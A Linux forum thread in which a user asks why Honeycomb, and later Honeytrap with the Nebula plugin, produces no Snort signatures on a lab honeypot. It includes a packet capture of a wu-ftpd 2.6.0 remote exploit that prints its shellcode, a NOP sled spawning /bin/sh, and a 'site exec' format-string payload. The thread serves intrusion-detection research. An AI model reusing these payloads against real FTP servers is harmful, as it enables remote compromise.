In what occasion will Honeycomb generate snort signatures ?
Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
Well,
I've just tried capturing packets which is sent to my honeypot host. I was using tshark to capture the packets , and i was simulating wuftpd 2.6.0 service on my honeyd host and I run the wuftpd 2.6.0 remote exploit on the attacker's host.
This is the packet captured (http://silenceisdefeat.com/~l41n/ta/log.txt) when I was launching the exploit :
Quote:
0.000000 fe:fd:c0:a8:01:42 -> Broadcast ARP Who has 192.168.1.67? Tell 192.168.1.66
0.043489 fe:fd:c0:a8:01:43 -> fe:fd:c0:a8:01:42 ARP 192.168.1.67 is at fe:fd:c0:a8:01:43
0.000182 192.168.1.66 -> 192.168.1.137 TCP 3749 > ftp [FIN, ACK] Seq=0 Ack=0 Win=5840 Len=0
0.032176 192.168.1.137 -> 192.168.1.66 TCP ftp > 3749 [RST] Seq=0 Len=0
1.967908 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [SYN] Seq=0 Len=0 MSS=1460 TSV=206641 TSER=0 WS=1
1.970102 192.168.1.137 -> 192.168.1.66 TCP ftp > 3954 [SYN, ACK] Seq=0 Ack=1 Win=16430 Len=0 MSS=1460
1.971863 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=1 Ack=1 Win=5840 Len=0
2.071551 192.168.1.137 -> 192.168.1.66 FTP Response: 220 localhost.localdomain. FTP server (Version wu-2.6.0(5) Wed May 20 11:51:25 EDT 2009) ready.
2.072890 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=1 Ack=98 Win=5840 Len=0
2.080058 192.168.1.66 -> 192.168.1.137 FTP Request: USER ANONYMOUS
2.081984 192.168.1.137 -> 192.168.1.66 TCP ftp > 3954 [ACK] Seq=98 Ack=17 Win=16414 Len=0
2.330652 192.168.1.137 -> 192.168.1.66 FTP Response: 331 Guest login ok, send your complete e-mail address as a password.
2.334295 192.168.1.66 -> 192.168.1.137 FTP Request: PASS \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\2201\300PPP\260~\315\2001\3331\300CCSKSS\260Z\315\200\353w^1\300\215^\001\210F\004fh\377\377\00 1SS\260\210\315\2001\300\215^\001SS\260=\315\2001\3001\333\215^\b\211C\0021\311\376\3111\300\215^\bS S\260\f\315\200\376\311u\3611\300\210F\t\215^\bSS\260=\315\200\376\016\2600\376\310\210F\0041\300\21 0F\a\211v\b\211F\f\211\363\215N\b\215V\fRQSS\260;\315\2001\3001\333SS\260\001\315\200\350\204\377\37 7\377\377\377\3770bin0sh1..11venglin
2.335162 192.168.1.137 -> 192.168.1.66 TCP ftp > 3954 [ACK] Seq=168 Ack=523 Win=15924 Len=0
2.561078 192.168.1.137 -> 192.168.1.66 FTP Response: 230-Hello User at ,
2.562235 192.168.1.137 -> 192.168.1.66 FTP Response: 230-we have 911 users (max 1800) logged in in your class at the moment.
2.563376 192.168.1.137 -> 192.168.1.66 FTP Response: 230-Local time is: Wed May 20 11:51:25 EDT 2009
2.571050 192.168.1.137 -> 192.168.1.66 FTP Response: 230-All transfers are logged. If you don't like this, disconnect now.
2.571077 192.168.1.137 -> 192.168.1.66 FTP Response: 230-
2.571088 192.168.1.137 -> 192.168.1.66 FTP Response: 230-tar-on-the-fly and gzip-on-the-fly are implemented; to get a whole
2.571099 192.168.1.137 -> 192.168.1.66 FTP Response: 230-directory "foo", "get foo.tar" or "get foo.tar.gz" may be used.
2.571111 192.168.1.137 -> 192.168.1.66 FTP Response: 230-Please use gzip-on-the-fly only if you need it; most files already
2.571122 192.168.1.137 -> 192.168.1.66 FTP Response: 230-are compressed, and I will kill your processes if you waste my
2.571133 192.168.1.137 -> 192.168.1.66 FTP Response: 230-ressour
2.571144 192.168.1.137 -> 192.168.1.66 FTP Response: ces.
2.571155 192.168.1.137 -> 192.168.1.66 FTP Response: 230-
2.571166 192.168.1.137 -> 192.168.1.66 FTP Response: 230-The command "site exec locate pattern" will create a list of all
2.571177 192.168.1.137 -> 192.168.1.66 FTP Response: 230-path names containing "pattern".
2.573032 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=523 Ack=762 Win=5840 Len=0
2.620150 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=523 Ack=800 Win=5840 Len=0
3.651774 192.168.1.137 -> 192.168.1.66 FTP Response: 230-
3.653009 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=523 Ack=854 Win=5840 Len=0
5.051493 fe:fd:c0:a8:01:43 -> fe:fd:c0:a8:01:42 ARP Who has 192.168.1.66? Tell 192.168.1.67
5.052786 fe:fd:c0:a8:01:42 -> fe:fd:c0:a8:01:43 ARP 192.168.1.66 is at fe:fd:c0:a8:01:42
5.676289 192.168.1.66 -> 192.168.1.137 FTP Request: site exec xx\274\306\277\277%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f% .f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f %.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f% .f%.f%.f%.f%.f%d%c%c%.f|%p
5.677273 192.168.1.137 -> 192.168.1.66 TCP ftp > 3954 [ACK] Seq=854 Ack=949 Win=16004 Len=0
5.791002 192.168.1.137 -> 192.168.1.66 FTP Response: 500 'site': command not understood.
5.792187 192.168.1.66 -> 192.168.1.137 TCP 3954 > ftp [ACK] Seq=949 Ack=891 Win=5840 Len=0
If being compared to the captured packet of wuftpd 2.6.0 exploit which I found on http://www.inguardians.com/research/docs/sigs.pdf , it looks similar (but I still want to know your opinion bout it) :
Hmm, no comments on your approach except with known exploits I'd strongly suggest using known signatures for checking. I mean that's way easier, isn't it? And maybe it would be an idea to research about other other automagical rule generation efforts? For instance Honeytrap with the Nebula plugin might be interesting once you get the source to work.
Nebula is at Sourceforge and Honeytrap at SVN at carnivore.it. Basically you just build Honeytrap --with-plugin-nebula (or like that), configure the plugin in honeytrap.conf and build Nebula.
successfully installed both honeytrap and nebulla . succesfully loaded nebulla plugin from the honeytrap , but still got no snort signatures generated ..
Have you tried them out ?
-c = is a percentage (0 to 100) of similarity that should be met by the data to be put in a cluster. The similarity gives you control on how strict you want to be when clustering data.
-t = tells nebula when it should start creating a signature. The idea here is that you don't want signatures that are based on a small amount of source data. Higher amounts of source data produce better signatures.
Then , start testing by executing some exploits againsts the honeytrap host , then you should see some signatures are being generated
Thanks for posting. Two questions if I may. Why did you choose nfq in --with-stream-mon= over pcap? And can you say anything wrt the "quality" of the sigs? Does it come close to your original objective?
you should set the value of -t and -c higher to get better signs , I was using the lower value , just only to make sure if the plugin works or not (and to get some quick signs) . since i'm not familiar with snort signs yet , i can't say if it's close to the objective or not
well , in fact you can use either both pcap or nfq , since i only got netfilter_queue installed on my host I decided to use it as a test.
thanx
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.